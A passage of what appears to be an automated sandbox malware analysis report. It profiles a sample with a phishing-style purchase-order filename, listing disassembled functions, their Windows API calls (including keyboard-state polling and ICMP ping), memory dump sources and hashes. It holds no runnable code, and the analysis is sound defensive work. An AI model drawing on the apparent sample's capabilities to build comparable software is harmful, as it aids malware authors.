                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                        • String ID:
                        • API String ID: 3566271842-0
                        • Opcode ID: 102219a2fa203e965f061624e6cbbdcb3e5f929bd15055c4a73408dff1bb7131
                        • Instruction ID: 22f3463b42c093dfbf5fa774636fd1792e17d9826fa1f5921107e8fcd762c164
                        • Opcode Fuzzy Hash: 102219a2fa203e965f061624e6cbbdcb3e5f929bd15055c4a73408dff1bb7131
                        • Instruction Fuzzy Hash: 76715F75A11219AFCB15DFA4C894ADEB7B8FF48350F008496E919EB261DB30EE50CF90
                        Function 002F388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 002F3908
                        • SetKeyboardState.USER32(?), ref: 002F3973
                        • GetAsyncKeyState.USER32(000000A0), ref: 002F3993
                        • GetKeyState.USER32(000000A0), ref: 002F39AA
                        • GetAsyncKeyState.USER32(000000A1), ref: 002F39D9
                        • GetKeyState.USER32(000000A1), ref: 002F39EA
                        • GetAsyncKeyState.USER32(00000011), ref: 002F3A16
                        • GetKeyState.USER32(00000011), ref: 002F3A24
                        • GetAsyncKeyState.USER32(00000012), ref: 002F3A4D
                        • GetKeyState.USER32(00000012), ref: 002F3A5B
                        • GetAsyncKeyState.USER32(0000005B), ref: 002F3A84
                        • GetKeyState.USER32(0000005B), ref: 002F3A92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 4b8bd4d23904c1ee8a8cf092156d43b7da0217f30d108d433db6dfb46fe7a076
                        • Instruction ID: 5e80c681e4f302c1862312c3a560087e32381335c3aba10e10af8ecaa7c4e80c
                        • Opcode Fuzzy Hash: 4b8bd4d23904c1ee8a8cf092156d43b7da0217f30d108d433db6dfb46fe7a076
                        • Instruction Fuzzy Hash: 8A51C620A1478D29FB35EFA488117FAEFF45F013C0F0885AAD6C2561C2DA949B9CCB65
                        Function 002EFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 002EFB19
                        • GetWindowRect.USER32(00000000,?), ref: 002EFB2B
                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002EFB89
                        • GetDlgItem.USER32(?,00000002), ref: 002EFB94
                        • GetWindowRect.USER32(00000000,?), ref: 002EFBA6
                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002EFBFC
                        • GetDlgItem.USER32(?,000003E9), ref: 002EFC0A
                        • GetWindowRect.USER32(00000000,?), ref: 002EFC1B
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002EFC5E
                        • GetDlgItem.USER32(?,000003EA), ref: 002EFC6C
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002EFC89
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 002EFC96
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: a912ddb20dc0500df13aa5547ea7d35962da9c7d6f70a6ea7e98028a20e276e4
                        • Instruction ID: 27036a9f8f4a7ee99ca674b0dd8d61744f11b1e17253a487075ec6107553bca9
                        • Opcode Fuzzy Hash: a912ddb20dc0500df13aa5547ea7d35962da9c7d6f70a6ea7e98028a20e276e4
                        • Instruction Fuzzy Hash: E4512171B10209AFDB18CF69DD95AAEBBBAFB88714F54813DF915D7290D7709D008B10
                        Function 002CB86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B4954,00000000), ref: 002B4A23
                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,002CB85B), ref: 002CB926
                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 002CB9BD
                        • DestroyAcceleratorTable.USER32(00000000), ref: 0032E775
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 0032E7A6
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 0032E7BD
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 0032E7D9
                        • DeleteObject.GDI32(00000000), ref: 0032E7EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 71641c2b63721fb32e61fb0dd99e161cefdefe083be0ac121eb51ca443ad6883
                        • Instruction ID: 13ae9267477d0b7a5f0f7e2345f117e9fbd3cd792f4a39e140f9ce7db9bc9146
                        • Opcode Fuzzy Hash: 71641c2b63721fb32e61fb0dd99e161cefdefe083be0ac121eb51ca443ad6883
                        • Instruction Fuzzy Hash: A361A932120721EFDB379F69E88AB25B7F9FB45712F14061DE19A86570C7B0A8A0DF41
                        Function 002CB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CB155: GetWindowLongW.USER32(?,000000EB), ref: 002CB166
                        • GetSysColor.USER32(0000000F), ref: 002CB067
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 89021f814bc58bf6dece317ce730523e09bacb8543e36377709b1bee43dad1ca
                        • Instruction ID: 0a7d8f21b5831949481870cf41212c57bc9c3a36051eede50c08a8299d1f1693
                        • Opcode Fuzzy Hash: 89021f814bc58bf6dece317ce730523e09bacb8543e36377709b1bee43dad1ca
                        • Instruction Fuzzy Hash: 3F41A131510510AFDB235F38EC8AFBA3B69AB06721F184369FD758A1E1D7718C51DB22
                        Function 002F7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                        • String ID:
                        • API String ID: 136442275-0
                        • Opcode ID: 0cbdef5c4412a9b90ada2eac0e62d59fbda754d5a8dee1cc5d1f428b653ef66d
                        • Instruction ID: 334356e7797fdf53ed1c648f28d8386b1f946f38055ef97f3f6e9b2008ee6931
                        • Opcode Fuzzy Hash: 0cbdef5c4412a9b90ada2eac0e62d59fbda754d5a8dee1cc5d1f428b653ef66d
                        • Instruction Fuzzy Hash: 2341F17291411CAADB21EB50CC55EEEB3BCAB08350F5041E7F619A2151EB71AFE8CF64
                        Function 002B84A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        • __swprintf.LIBCMT ref: 002B84E5
                        • __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002D2177: _xtow@16.LIBCMT ref: 002D2198
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __itow__swprintf_xtow@16
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 1502193981-2263619337
                        • Opcode ID: 5db6ec32781d803fc3aa91d2475b07539159d6c9a4d8bacb88cc31ff34e53fc1
                        • Instruction ID: 9e7924218992692a319be8fe60e01aa1817441c7e710fb603299d4738b1b9b3e
                        • Opcode Fuzzy Hash: 5db6ec32781d803fc3aa91d2475b07539159d6c9a4d8bacb88cc31ff34e53fc1
                        • Instruction Fuzzy Hash: 11412432520605DBDB25DF38D841FAAB7E9BB44350F30446AE54ED7291EA71DA51CF10
                        Function 002D5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002D5CCA
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __gmtime64_s.LIBCMT ref: 002D5D63
                        • __gmtime64_s.LIBCMT ref: 002D5D99
                        • __gmtime64_s.LIBCMT ref: 002D5DB6
                        • __allrem.LIBCMT ref: 002D5E0C
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D5E28
                        • __allrem.LIBCMT ref: 002D5E3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D5E5D
                        • __allrem.LIBCMT ref: 002D5E74
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D5E92
                        • __invoke_watson.LIBCMT ref: 002D5F03
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                        • String ID:
                        • API String ID: 384356119-0
                        • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                        • Instruction ID: 7e3b79a1162d7f27a7b310ba47fb224f17e940d7c81ccc2e6b95a8c10a8a4210
                        • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                        • Instruction Fuzzy Hash: 8B71F871A21F27ABD714EE79CC41B6AB3A8AF04324F14412BF514D7781E7B0DE608B90
                        Function 002F57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002F5816
                        • GetMenuItemInfoW.USER32(003718F0,000000FF,00000000,00000030), ref: 002F5877
                        • SetMenuItemInfoW.USER32(003718F0,00000004,00000000,00000030), ref: 002F58AD
                        • Sleep.KERNEL32(000001F4), ref: 002F58BF
                        • GetMenuItemCount.USER32(?), ref: 002F5903
                        • GetMenuItemID.USER32(?,00000000), ref: 002F591F
                        • GetMenuItemID.USER32(?,-00000001), ref: 002F5949
                        • GetMenuItemID.USER32(?,?), ref: 002F598E
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002F59D4
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F59E8
                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F5A09
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                        • String ID:
                        • API String ID: 4176008265-0
                        • Opcode ID: 50975382fb68bde7001c28962e1ec1dcfbf14a5fe1aea2e33235a59934e7ba50
                        • Instruction ID: 7f1426c04d1604ebc07743986651c0a10c8b460d3a600acbd5b25071d2230b27
                        • Opcode Fuzzy Hash: 50975382fb68bde7001c28962e1ec1dcfbf14a5fe1aea2e33235a59934e7ba50
                        • Instruction Fuzzy Hash: 1C61C47192066EEFEB15CF64D888ABEBBB8EB05394F140129F741A3251D7709D61CF60
                        Function 00319A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00319AA5
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00319AA8
                        • GetWindowLongW.USER32(?,000000F0), ref: 00319ACC
                        • _memset.LIBCMT ref: 00319ADD
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00319AEF
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00319B67
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        • Opcode ID: 1f512bf74addb357036c21ffed35d59d3191f83b7738a4388fed0a809c1007fe
                        • Instruction ID: b7f95d7f749ab2e60d78b527aa9a30a75a408c3ad5acd1b7cea15bf8e6c9156e
                        • Opcode Fuzzy Hash: 1f512bf74addb357036c21ffed35d59d3191f83b7738a4388fed0a809c1007fe
                        • Instruction Fuzzy Hash: 6F615D75900208AFDB26DFA8CC91FEE77F8AF09700F14415AFA15A7291D770A985DB90
                        Function 002F3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 002F3591
                        • GetAsyncKeyState.USER32(000000A0), ref: 002F3612
                        • GetKeyState.USER32(000000A0), ref: 002F362D
                        • GetAsyncKeyState.USER32(000000A1), ref: 002F3647
                        • GetKeyState.USER32(000000A1), ref: 002F365C
                        • GetAsyncKeyState.USER32(00000011), ref: 002F3674
                        • GetKeyState.USER32(00000011), ref: 002F3686
                        • GetAsyncKeyState.USER32(00000012), ref: 002F369E
                        • GetKeyState.USER32(00000012), ref: 002F36B0
                        • GetAsyncKeyState.USER32(0000005B), ref: 002F36C8
                        • GetKeyState.USER32(0000005B), ref: 002F36DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: e773353197fa5dbfb39417b61e420ec104d84e2d062f8608931c9c91a15ff2f1
                        • Instruction ID: 02b2d1f197e3a137219b8981557de95af50b36536833895a37aa1e91b9b27aea
                        • Opcode Fuzzy Hash: e773353197fa5dbfb39417b61e420ec104d84e2d062f8608931c9c91a15ff2f1
                        • Instruction Fuzzy Hash: 1941B3605147CE7DFF31CE7484143B5FAA86B153C4F444069D7C6862C2EBA49BE88B6A
                        Function 002EA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002EA2AA
                        • SafeArrayAllocData.OLEAUT32(?), ref: 002EA2F5
                        • VariantInit.OLEAUT32(?), ref: 002EA307
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 002EA327
                        • VariantCopy.OLEAUT32(?,?), ref: 002EA36A
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 002EA37E
                        • VariantClear.OLEAUT32(?), ref: 002EA393
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 002EA3A0
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002EA3A9
                        • VariantClear.OLEAUT32(?), ref: 002EA3BB
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002EA3C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 37267096327d6b5faa9c7631a0059bed3cbe4b8e53c3ee740a06cddd805ff08b
                        • Instruction ID: d07d819b30041cb2be771aa277d2324a86f94ac8a05faeefa62c6feeabc95961
                        • Opcode Fuzzy Hash: 37267096327d6b5faa9c7631a0059bed3cbe4b8e53c3ee740a06cddd805ff08b
                        • Instruction Fuzzy Hash: E8412A31910219AFDB01DFA6E8889DEBFB9FF48344F408065F901A7261DB74AA55CBA1
                        Function 0030B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • CoInitialize.OLE32 ref: 0030B298
                        • CoUninitialize.OLE32 ref: 0030B2A3
                        • CoCreateInstance.OLE32(?,00000000,00000017,0033D8FC,?), ref: 0030B303
                        • IIDFromString.OLE32(?,?), ref: 0030B376
                        • VariantInit.OLEAUT32(?), ref: 0030B410
                        • VariantClear.OLEAUT32(?), ref: 0030B471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 834269672-1287834457
                        • Opcode ID: 423c06f5d3312335ebde9eea5ae0329b4d0c73471be4ec50a96730bf58081ad8
                        • Instruction ID: f09280d70d0a3609675d434801fe017b21a18d7512400c0ad303592db6917d24
                        • Opcode Fuzzy Hash: 423c06f5d3312335ebde9eea5ae0329b4d0c73471be4ec50a96730bf58081ad8
                        • Instruction Fuzzy Hash: 6E61A930205301AFC712DF64C895BAEF7E8AF88754F14495DF9859B292CB70EE48CB92
                        Function 00308694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 003086F5
                        • inet_addr.WSOCK32(?,?,?), ref: 0030873A
                        • gethostbyname.WSOCK32(?), ref: 00308746
                        • IcmpCreateFile.IPHLPAPI ref: 00308754
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003087C4
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003087DA
                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0030884F
                        • WSACleanup.WSOCK32 ref: 00308855
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: 261fe790d48ce1f30c4bf9ec50f359cbc936a85b6451c5743a2d5c56dc766944
                        • Instruction ID: 04b522a31da2e466e1ddbd85c35b13ab8e8609f46591a1c11ebb0587f38574f6
                        • Opcode Fuzzy Hash: 261fe790d48ce1f30c4bf9ec50f359cbc936a85b6451c5743a2d5c56dc766944
                        • Instruction Fuzzy Hash: AB51A1316042019FDB12EF24CC95B6ABBE8AF48760F15892AF5969B2E1DB70EC10CF41
                        Function 00319C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00319C68
                        • CreateMenu.USER32 ref: 00319C83
                        • SetMenu.USER32(?,00000000), ref: 00319C92
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00319D1F
                        • IsMenu.USER32(?), ref: 00319D35
                        • CreatePopupMenu.USER32 ref: 00319D3F
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00319D70
                        • DrawMenuBar.USER32 ref: 00319D7E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
